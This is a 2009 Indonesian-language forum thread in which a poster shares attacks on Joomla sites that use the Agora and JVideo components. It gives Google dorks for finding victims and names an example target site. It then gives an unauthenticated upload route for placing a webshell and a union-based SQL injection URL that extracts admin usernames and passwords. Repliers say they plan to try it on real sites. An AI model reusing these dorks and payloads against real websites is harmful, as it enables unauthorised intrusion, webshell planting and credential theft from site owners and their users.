Page 1 of 3

Joomla Component Vuln

Posted: Mon Jun 08, 2009 8:38 pm
by N4ck0
Courtesy Milw0rm.com

Just Share vuln On joomla CMS

I

1. Find viktim om google,

dgn dork
inurl:option=com_agora


2.setelah dapet viktimnya, loe masukan exploitnya :


index.php?option=com_agora&task=upload

misalnya :
http://40kwarzone.com/index.php?option= ... ask=upload

3.Browse webshell yg kita punya
4.Kalau sukses ganti urlnya jadi gini


components/com_agora/img/members/0/

misalnya :
http://40kwarzone.com/components/com_ag ... members/0/ [shell yg kita upload ]

II

type in google with dork :

inurl:option=com_jvideo or
inurl:com_jvideo

masukin exploitnya

index.php?option=com_jvideo&view=user&user_id=62+and%201=2+union+select+concat(username,0x3a,password)+from+jos_users

semoga bermanfaat

Re: Joomla Component Vuln

Posted: Tue Jun 09, 2009 12:06 am
by anja_indie
to semua wweb yg pk joomla kan???
jajal ah.........

Re: Joomla Component Vuln

Posted: Wed Jun 10, 2009 4:01 am
by vodork
emm...
besok coba ah... :D :D

Re: Joomla Component Vuln

Posted: Wed Jun 10, 2009 5:29 am
by taurnil
cuma bisa di joomla yang pke component agora shop ama component jvideo kan y bro y? CMIIW

Re: Joomla Component Vuln

Posted: Wed Jun 10, 2009 7:02 pm
by N4ck0
anja_indie wrote:to semua wweb yg pk joomla kan???
jajal ah.........
iya itu buat web berbasis joomla
vodork wrote:emm...
besok coba ah... :D :D
silahkan kk
taurnil wrote:cuma bisa di joomla yang pke component agora shop ama component jvideo kan y bro y? CMIIW

iya mang tuh componentnya joomla kk

Re: Joomla Component Vuln

Posted: Wed Jun 10, 2009 7:44 pm
by andi90
kk itu buat apa sih?
maklumlah saia cupu

Re: Joomla Component Vuln

Posted: Thu Jun 11, 2009 9:53 am
by N4ck0
andi90 wrote:kk itu buat apa sih?
maklumlah saia cupu
itu kelemahan yg ada di web berbasis joomla
klo kita dapat mengetahui user N pass adminnya

Re: Joomla Component Vuln

Posted: Thu Jun 11, 2009 1:10 pm
by andi90
N4ck0 wrote:
andi90 wrote:kk itu buat apa sih?
maklumlah saia cupu
itu kelemahan yg ada di web berbasis joomla
klo kita dapat mengetahui user N pass adminnya
termasuk masuk ke joomla administration itu webnya yah?

Re: Joomla Component Vuln

Posted: Thu Jun 11, 2009 8:35 pm
by N4ck0
andi90 wrote:
N4ck0 wrote:
andi90 wrote:kk itu buat apa sih?
maklumlah saia cupu
itu kelemahan yg ada di web berbasis joomla
klo kita dapat mengetahui user N pass adminnya
termasuk masuk ke joomla administration itu webnya yah?

iya kk
mang itu buat jadi adminnya
ada juga yang langsung upload shell kita

Re: Joomla Component Vuln

Posted: Fri Jun 12, 2009 2:23 am
by ji_bog
:P wew keren neh
thanks for share bro ;)